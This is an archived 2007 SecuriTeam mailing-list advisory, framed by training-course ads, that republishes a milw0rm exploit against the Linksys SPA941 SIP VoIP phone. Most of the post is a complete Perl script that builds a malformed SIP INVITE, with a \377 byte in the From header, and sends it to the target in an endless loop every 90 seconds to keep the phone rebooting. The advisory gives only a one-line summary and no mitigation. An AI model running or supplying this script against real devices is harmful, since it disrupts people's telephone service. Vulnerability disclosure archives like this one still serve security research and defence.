Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]

[EXPL] Linksys SPA941 Denial of Service Exploit (Reboot)

Subject: [EXPL] Linksys SPA941 Denial of Service Exploit (Reboot)
Date: 26 Apr 2007 14:25:49 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Linksys SPA941 Denial of Service Exploit (Reboot)
------------------------------------------------------------------------


SUMMARY

A vulnerability in Linksys SPA941 SIP VoIP phone by sending it a malformed 
SIP packet, which in turn allows to continuously reboot the phone causing 
denial of service.

DETAILS

Exploit:
#!/usr/bin/perl

use IO::Socket;

#die "Usage $0 <username> <dst_IP> <Source_IP> <SourcePort>" unless 
($ARGV[2]);
die "Usage $0 <username> <dst_IP> <SourceIp> <sourceport>" unless 
($ARGV[0]);

my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => 
$ARGV[3], Proto => 'udp');
$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', 
Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061');

$touser=$ARGV[0];
$target=$ARGV[1];
$sourceaddress=$ARGV[2];
$sourceport=$ARGV[3];
$high=2000;
$low=1;

$fromuserid = int(rand( $high-$low+1 ) ) + $low;
my $cseq = "INVITE";

$msg = "INVITE sip:$touser\@$target SIP/2.0\r
Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r
From: \377<sip:$fromuserid\@$sourceaddress>;tag=779\r
To: Receiver <sip:$touser\@$target>\r
Call-ID: 10\@$sourceaddress\r
CSeq: 1 $cseq\r
Contact: 779 <sip:$fromuserid\@$sourceaddress>\r
Expires: 1200\r
Max-Forwards: 70\r
Content-Type: application/sdp\r
Content-Length: 133\r
\r
v=0\r
o=0 0 0 IN IP4 $sourceaddress\r
s=Session SDP\r
c=IN  IP4 $sourceaddress\r
t=0 0\r
m=audio 9876 RTP/AVP 0\r
a=rtpmap:0 PCMU/8000\r";

$sock or die "no socket :$!";
while (1) {
  $socket->send($msg);
  sleep 90;
}


ADDITIONAL INFORMATION

The information has been provided by milw0rm.
The original article can be found at:
 <http://www.milw0rm.com/exploits/3792> 
http://www.milw0rm.com/exploits/3792



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




<Prev in Thread] Current Thread [Next in Thread>
  • [EXPL] Linksys SPA941 Denial of Service Exploit (Reboot), SecuriTeam <=